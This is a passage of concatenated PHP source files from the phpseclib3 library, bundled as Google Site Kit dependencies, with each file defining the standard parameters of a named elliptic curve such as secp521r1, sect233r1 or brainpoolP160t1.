\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A9FB57DBA1EEA9BC3E660A909D838D718C397AA3B561A6F7901E0E82974856A7', 16)); } } <?php /** * nistb409 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistb409 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect409r1 { } <?php /** * nistp521 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistp521 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp521r1 { } <?php /** * prime192v3 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class prime192v3 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('22123DC2395A05CAA7423DAECCC94760A7D462256BD56916', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7D29778100C65A1DA1783716588DCE2B8B4AEE8E228F1896', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('38A90F22637337334B49DCB66A6DC8F9978ACA7648A943B0', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFF7A62D031C83F4294F640EC13', 16)); } } <?php /** * secp521r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp521r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0051953EB9618E1C9A1F929A21A0B68540EEA2DA725B99B315F3B8B489918EF1' . '09E156193951EC7E937B1652C0BD3BB1BF073573DF883D2C34F1EF451FD46B50' . '3F00', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('00C6858E06B70404E9CD9E3ECB662395B4429C648139053FB521F828AF606B4D' . '3DBAA14B5E77EFE75928FE1DC127A2FFA8DE3348B3C1856A429BF97E7E31C2E5' . 'BD66', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('011839296A789A3BC0045C8A5FB42C7D1BD998F54449579B446817AFBD17273E' . '662C97EE72995EF42640C550B9013FAD0761353C7086A272C24088BE94769FD1' . '6650', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF' . 'FFFA51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E9138' . '6409', 16)); } } <?php /** * sect131r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect131r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(131, 8, 3, 2, 0); $this->setCoefficients('07A11B09A76B562144418FF3FF8C2570B8', '0217C05610884B63B9C6C7291678F9D341'); $this->setBasePoint('0081BAF91FDF9833C40F9C181343638399', '078C6E7EA38C001F73C8134B1B4EF9E150'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0400000000000000023123953A9464B54D', 16)); } } <?php /** * brainpoolP192r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP192r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('6A91174076B1E0E19C39C031FE8685C1CAE040E5C69A28EF', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('469A28EF7C28CCA3DC721D044F4496BCCA7EF4146FBF25C9', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C0A0647EAAB6A48753B033C56CB0F0900A2F5C4853375FD6', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('14B690866ABD5BB88B5F4828C1490002E6773FA2FA299B8F', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1', 16)); } } <?php /** * sect163r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect163r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients('000000000000000000000000000000000000000001', '020A601907B8C953CA1481EB10512F78744A3205FD'); $this->setBasePoint('03F0EBA16286A2D57EA0991168D4994637E8343E36', '00D51FBC6C71A0094FA2CDD545B11C5C0C797324F1'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('040000000000000000000292FE77E70C12A4234C33', 16)); } } <?php /** * nistk233 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistk233 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect233k1 { } <?php /** * sect233r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect233r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(233, 74, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000001', '0066647EDE6C332C7F8C0923BB58213B333B20E9CE4281FE115F7D8F90AD'); $this->setBasePoint('00FAC9DFCBAC8313BB2139F1BB755FEF65BC391F8B36F8F8EB7371FD558B', '01006A08A41903350678E58528BEBF8A0BEFF867A7CA36716F7E01F81052'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01000000000000000000000000000013E974E72F8A6922031D2603CFE0D7', 16)); } } <?php /** * secp384r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp384r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('B3312FA7E23EE7E4988E056BE3F82D19181D9C6EFE8141120314088F5013875AC656398D8A2ED19D2A85C8EDD3EC2AEF', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('AA87CA22BE8B05378EB1C71EF320AD746E1D3B628BA79B9859F741E082542A385502F25DBF55296C3A545E3872760AB7', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3617DE4A96262C6F5D9E98BF9292DC29F8F41DBD289A147CE9DA3113B5F0B8C00A60B1CE1D7E819D7A431D7C90EA0E5F', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973', 16)); } } <?php /** * sect239k1 * * PHP version 5 and 7 * * @author Jim Wiggint on <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect239k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(239, 158, 0); $this->setCoefficients('000000000000000000000000000000000000000000000000000000000000', '000000000000000000000000000000000000000000000000000000000001'); $this->setBasePoint('29A0B6A887A983E9730988A68727A8B2D126C44CC2CC7B2A6555193035DC', '76310804F12E549BDB011C103089E73510ACB275FC312A5DC6B76553F0CA'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('2000000000000000000000000000005A79FEC67CB6E91F1C1DA800E478A5', 16)); } } <?php /** * secp160r2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp160r2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { // same as secp160k1 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC73', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC70', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('B4E134D3FB59EB8BAB57274904664D5AF50388BA', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('52DCB034293A117E1F4FF11B30F7199D3144CE6D', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FEAFFEF2E331F296E071FA0DF9982CFEA7D43F2E', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0100000000000000000000351EE786A818F3A1A16B', 16)); } } <?php /** * nistp384 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistp384 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\secp384r1 { } <?php /** * secp112r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp112r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('DB7C2ABF62E35E668076BEAD208B', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('DB7C2ABF62E35E668076BEAD2088', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('659EF8BA043916EEDE8911702B22', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('09487239995A5EE76B55F9C2F098', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('A89CE5AF8724C0A23E0E0FF77500', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('DB7C2ABF62E35E7628DFAC6561C5', 16)); } } <?php /** * secp160r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp160r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF7FFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('1C97BEFC54BD7A8B65ACF89F81D4D4ADC565FA45', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('4A96B5688EF573284664698968C38BB913CBFC82', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('23A628553168947D59DCC912042351377AC5FB32', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0100000000000000000001F4C8F927AED3CA752257', 16)); } } <?php /** * secp160k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp160k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\KoblitzPrime { public function __construct() { // same as secp160r2 $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFAC73', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0000000000000000000000000000000000000000', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0000000000000000000000000000000000000007', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3B4C382CE37AA192A4019E763036F4F5DD4D7EBB', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('938CF935318FDCED6BC28286531733C3F03C4FEE', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0100000000000000000001B8FA16DFAB9ACA16B6B3', 16)); $this->basis = []; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('0096341F1138933BC2F505', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FF6E9D0418C67BB8D5F562', -16)]; $this->basis[] = ['a' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('01BDCB3A09AAAABEAFF4A8', -16), 'b' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('04D12329FF0EF498EA67', -16)]; $this->beta = $this->factory->newInteger(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('645B7345A143464942CC46D7CF4D5D1E1E6CBB68', -16)); } } <?php /** * brainpoolP160t1 * * This curve is a twisted version of brainpoolP160r1 with A = -3. With brainpool, * the curves ending in r1 are the "regular" curves and the curves ending in "t1" * are the twisted version of the r1 curves. Per https://tools.ietf.org/html/rfc5639#page-7 * you can convert a point on an r1 curve to a point on a t1 curve thusly: * * F(x,y) := (x*Z^2, y*Z^3) * * The advantage of A = -3 is that some of the point doubling and point addition can be * slightly optimized. See http://hyperelliptic.org/EFD/g1p/auto-shortw-projective-3.html * vs http://hyperelliptic.org/EFD/g1p/auto-shortw-projective.html for example. * * phpseclib does not currently take advantage of this optimization opportunity * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP160t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620F', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E95E4A5F737059DC60DFC7AD95B3D8139515620C', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7A556B6DAE535B7B51ED2C4D7DAA7A0B5C55F380', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('B199B13B9B34EFC1397E64BAEB05ACC265FF2378', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('ADD6718B7C7C1961F0991B842443772152C9E0AD', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E95E4A5F737059DC60DF5991D45029409E60FC09', 16)); } } <?php /** * prime239v2 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class prime239v2 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF7FFFFFFFFFFF8000000000007FFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('617FAB6832576CBBFED50D99F0249C3FEE58B94BA0038C7AE84C8C832F2C', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('38AF09D98727705120C921BB5E9E26296A3CDCF2F35757A0EAFD87B830E7', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('5B0125E4DBEA0EC7206DA0FC01D9B081329FB555DE6EF460237DFF8BE4BA', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('7FFFFFFFFFFFFFFFFFFFFFFF800000CFA7E8594377D414C03821BC582063', 16)); } } <?php /** * nistk163 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistk163 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect163k1 { } <?php /** * secp224r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp224r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000001', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFE', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('B4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('B70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('BD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D', 16)); } } <?php /** * nistk409 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; final class nistk409 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves\sect409k1 { } <?php /** * sect163k1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class sect163k1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Binary { public function __construct() { $this->setModulo(163, 7, 6, 3, 0); $this->setCoefficients('000000000000000000000000000000000000000001', '000000000000000000000000000000000000000001'); $this->setBasePoint('02FE13C0537BBC11ACAA07D793DE4E6D5E5C94EEE8', '0289070FB05D38FF58321F2E800536D538CCDAA3D9'); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('04000000000000000000020108A2E0CC0D99F8A5EF', 16)); } } <?php /** * brainpoolP192t1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class brainpoolP192t1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86297', 16)); $this->setCoefficients( new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C302F41D932A36CDA7A3463093D18DB78FCE476DE1A86294', 16), // eg. -3 new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('13D56FFAEC78681E68F9DEB43B35BEC2FB68542E27897B79', 16) ); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('3AE9E58C82F63C30282E1FE7BBF43FA72C446AF6F4618129', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('097E2C5667C2223A902AB5CA449D0084B7E5B3DE7CCC01C9', 16)); $this->setOrder(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('C302F41D932A36CDA7A3462F9E9E916B5BE8F1029AC4ACC1', 16)); } } <?php /** * secp128r1 * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\Curves; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; class secp128r1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\EC\BaseCurves\Prime { public function __construct() { $this->setModulo(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFF', 16)); $this->setCoefficients(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('FFFFFFFDFFFFFFFFFFFFFFFFFFFFFFFC', 16), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('E87579C11079F43DD824993C2CEE5ED3', 16)); $this->setBasePoint(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger('161FF7528B899B2D0C28607CA52C5B86', 16), new 